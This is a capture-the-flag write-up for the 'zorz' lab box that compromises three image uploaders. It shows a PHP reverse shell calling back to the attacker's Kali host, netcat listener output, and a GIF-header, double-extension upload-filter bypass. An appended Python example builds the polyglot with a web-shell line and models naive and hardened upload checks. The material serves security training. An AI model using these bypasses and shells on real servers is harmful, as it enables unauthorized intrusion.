piyr9

Overview

Scanning the Perimeter

Let's see what we have here:

	Nmap scan report for 192.168.76.101
	Host is up (0.00031s latency).
	Not shown: 998 closed ports
	PORT   STATE SERVICE VERSION
	22/tcp open  ssh     (protocol 2.0)
	| ssh-hostkey: 
	|   1024 48:bb:d8:38:b8:25:a6:6c:5e:7f:67:c9:ec:53:cc:ed (DSA)
	|   2048 ec:55:48:93:28:90:f6:bf:3c:cd:e3:90:42:26:3b:5d (RSA)
	|_  256 3f:0a:11:c9:59:73:be:df:f7:77:59:65:07:91:d7:d6 (ECDSA)
	80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
	|_http-title: Site doesn't have a title (text/html).
	1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
	SF-Port22-TCP:V=6.47%I=7%D=4/22%Time=55384D20%P=x86_64-unknown-linux-gnu%r
	SF:(NULL,29,"SSH-2\.0-OpenSSH_6\.6\.1p1\x20Ubuntu-2ubuntu2\r\n");
	MAC Address: 08:00:27:9A:0D:2F (Cadmus Computer Systems)
	Device type: general purpose
	Running: Linux 3.X
	OS CPE: cpe:/o:linux:linux_kernel:3
	OS details: Linux 3.11 - 3.14
	Network Distance: 1 hop

	TRACEROUTE
	HOP RTT     ADDRESS
	1   0.31 ms 192.168.76.101

Point the browser to 192.168.76.101 and notice there is an image uploader, with links to two alternative uploaders (three in total).

Image Uploader #1


First, upload php-reverse.php (a PHP reverse shell with its callback address set to the Kali box, 192.168.76.102 port 4444, as the listener output below shows) through the first uploader. It takes the .php file as-is, with no check on extension or content.

Next, run DirBuster against the web server to find where uploaded files land.


There seemed to be an uploads2 folder, and when I used the 2nd upload method my test image popped up there. The 3rd upload method is the same as well, with a corresponding uploads3 directory. So why wouldn't there be an uploads1 directory? Sure enough, when I typed it in, there was.


Click on the PHP reverse shell in the uploads1 directory and my Kali listener picked it up:

	root@fox-kali:~# nc -lvp 4444
	listening on [any] 4444 ...
	192.168.76.101: inverse host lookup failed: Unknown server error : Connection timed out
	connect to [192.168.76.102] from (UNKNOWN) [192.168.76.101] 46425
	Linux zorz 3.13.0-45-generic #74-Ubuntu SMP Tue Jan 13 19:37:48 UTC 2015 i686 i686 i686 GNU/Linux
	 22:56:34 up  1:19,  0 users,  load average: 0.00, 0.01, 0.05
	USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
	uid=33(www-data) gid=33(www-data) groups=33(www-data)
	/bin/sh: 0: can't access tty; job control turned off
	$whoami
	www-data

	www-data@zorz:/var/www/html$ ls
	ls
	index.html   jQuery	    uploader.php   uploader3.php  uploads2
	index2.html  l337saucel337  uploader2.php  uploads1	  uploads3
	www-data@zorz:/var/www/html$ ls -ltr
	ls -ltr
	total 40
	-rwxr-xr-x 1 root     root     1980 Feb 18 16:40 uploader3.php
	-rw-r--r-- 1 root     root      398 Feb 18 20:20 uploader.php
	-rw-r--r-- 1 root     root     1410 Feb 18 20:50 uploader2.php
	-rwxr-xr-x 1 www-data www-data  367 Feb 18 20:54 index.html
	drwxr-xr-x 2 root     root     4096 Feb 18 22:22 jQuery
	-rwxr-xr-x 1 root     root      457 Feb 18 22:30 index2.html
	drwxr-xr-x 2 root     root     4096 Feb 18 22:45 l337saucel337
	drwxr-xr-x 2 www-data www-data 4096 Apr 22 22:37 uploads2
	drwxr-xr-x 2 www-data root     4096 Apr 22 22:41 uploads3
	drwxr-xr-x 2 www-data www-data 4096 Apr 22 22:42 uploads1
	www-data@zorz:/var/www/html$ cd l337saucel337
	cd l337saucel337
	www-data@zorz:/var/www/html/l337saucel337$ ls
	ls
	SECRETFILE
	www-data@zorz:/var/www/html/l337saucel337$ cat SECRETFILE
	cat SECRETFILE
	Great job so far. This box has 3 uploaders.

	The first 2 are pure php, the last one is php w/jquery.

	To get credit for this challenge, please submit a write-up or instructions
	on how you compromised the uploader or uploaders. If you solve 1, 2, or all
	of the uploader challenges, feel free to shoot me an email and let me know!

	admin@top-hat-sec.com

	Thanks for playing!
	http://www.top-hat-sec.com

Image Uploader #2

OK, let's try the second upload method; this one needs a bit more legwork.

Since this uploader only accepts certain image types, a file with a .php extension is rejected. Modify the file: open it in nano and put a GIF header in front of the PHP code, so that a check inspecting the leading bytes sees an image while the interpreter still runs what follows (PHP emits any bytes before the open tag verbatim, so the header does no harm to the shell):

	GIF89a;
	<?php
	// put the PHP reverse shell code here, unchanged apart from the header line above
	// (<?php rather than the short <? tag, which is off by default on this PHP version)
	?>

Next, rename the file so it ends in an accepted image extension while keeping .php in the name:

	root@fox-kali:~# mv php-reverse.php php-reverse.php.jpg

Upload the file and the uploader accepts it. Open an nc listener on Kali, navigate to the uploads2 folder, and click on the filename. Bingo! Whether a double extension such as .php.jpg is handed to the PHP interpreter depends on the server's handler configuration, which this box does not reveal; here it evidently is, since the shell comes back:

	root@fox-kali:~# nc -lvp 4444
	listening on [any] 4444 ...
	192.168.76.101: inverse host lookup failed: Unknown server error : Connection timed out
	connect to [192.168.76.102] from (UNKNOWN) [192.168.76.101] 47052
	Linux zorz 3.13.0-45-generic #74-Ubuntu SMP Tue Jan 13 19:37:48 UTC 2015 i686 i686 i686 GNU/Linux
	 00:24:18 up  2:47,  0 users,  load average: 0.00, 0.08, 3.65
	USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
	uid=33(www-data) gid=33(www-data) groups=33(www-data)
	/bin/sh: 0: can't access tty; job control turned off
	$

Image Uploader #3


OK, let's try image uploader 3. The same process as for uploader 2 works here too: the GIF-header, double-extension file is accepted and yields a reverse shell using the same steps.
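The file built above for uploaders 2 and 3, together with models of the checks it gets past and of a stricter check that would stop it, as an added example in Python. This is not the box's uploader code (the write-up never shows it): the check functions, the sample payload and the two Apache handler models are assumptions about typical configurations, not facts established on zorz.

```python
"""Added example: build the GIF-header / double-extension polyglot used against
uploaders 2 and 3, and model the checks it slips past versus a stricter one.
Every check function here is a hypothetical model, not the zorz box's own code."""
import re
import secrets

GIF_MAGIC = b"GIF89a"
ALLOWED_EXT = {"jpg", "jpeg", "png", "gif"}
# Magic bytes an image check would expect for each accepted extension.
SIGNATURES = {
    "gif": (b"GIF87a", b"GIF89a"),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
}

# Constructed stand-in for the reverse-shell body; the real php-reverse.php goes here.
PHP_PAYLOAD = b"<?php\n// reverse shell code would go here\nsystem($_GET['c']);\n?>\n"


def make_polyglot(php_source: bytes) -> bytes:
    """Prepend the GIF signature. PHP emits the bytes before '<?php' verbatim, so the
    file is 'a GIF' to a magic-bytes check and still a valid PHP script."""
    return GIF_MAGIC + b";\n" + php_source


def rename_for_upload(name: str, accepted_ext: str = "jpg") -> str:
    """Equivalent of `mv php-reverse.php php-reverse.php.jpg`."""
    return f"{name}.{accepted_ext}"


def extension_check(filename: str) -> bool:
    """Model of a whitelist that looks only at the final suffix (assumed)."""
    return filename.rsplit(".", 1)[-1].lower() in ALLOWED_EXT


def magic_check(data: bytes) -> bool:
    """Model of a content check that trusts the leading bytes, as getimagesize() does."""
    return data.startswith(tuple(sig for sigs in SIGNATURES.values() for sig in sigs))


def naive_upload_accepts(filename: str, data: bytes) -> bool:
    """What uploader 2 appears to do (assumed): extension whitelist plus magic bytes."""
    return extension_check(filename) and magic_check(data)


def mod_mime_picks_php_handler(filename: str) -> bool:
    """Model of `AddHandler application/x-httpd-php .php`: mod_mime treats every
    dot-separated segment as an extension, so x.php.jpg still gets the PHP handler."""
    return "php" in [seg.lower() for seg in filename.split(".")[1:]]


def filesmatch_picks_php_handler(filename: str) -> bool:
    """Model of the anchored FilesMatch stanza Ubuntu ships for mod_php; the regex
    must match at the end of the name, so x.php.jpg is served as a plain file."""
    return re.search(r"\.ph(p[345]?|t|tml)$", filename, re.IGNORECASE) is not None


def strict_upload_accepts(filename: str, data: bytes) -> bool:
    """Hardened model: exactly one extension, no PHP open tag anywhere in the body,
    and the magic bytes must agree with that extension."""
    parts = filename.lower().rsplit("/", 1)[-1].split(".")
    if len(parts) != 2 or parts[1] not in ALLOWED_EXT:
        return False
    if re.search(rb"<\?(php|=)?", data):
        return False
    return data.startswith(SIGNATURES[parts[1]])


def stored_name(ext: str) -> str:
    """Server-side regenerated name so the client never chooses the stored path."""
    return f"{secrets.token_hex(8)}.{ext}"


if __name__ == "__main__":
    poly = make_polyglot(PHP_PAYLOAD)
    name = rename_for_upload("php-reverse.php")
    print(name, "naive:", naive_upload_accepts(name, poly), "strict:", strict_upload_accepts(name, poly))
    print("AddHandler runs it:", mod_mime_picks_php_handler(name),
          "FilesMatch runs it:", filesmatch_picks_php_handler(name))
```

The two handler models are the caveat from the uploader 2 section in code: the same php-reverse.php.jpg executes under a segment-based AddHandler and does not under the anchored FilesMatch stanza, and which of these (or some other arrangement) the box uses is not visible from the write-up. The strict check rejects the file on the double extension alone, before it ever looks at the payload.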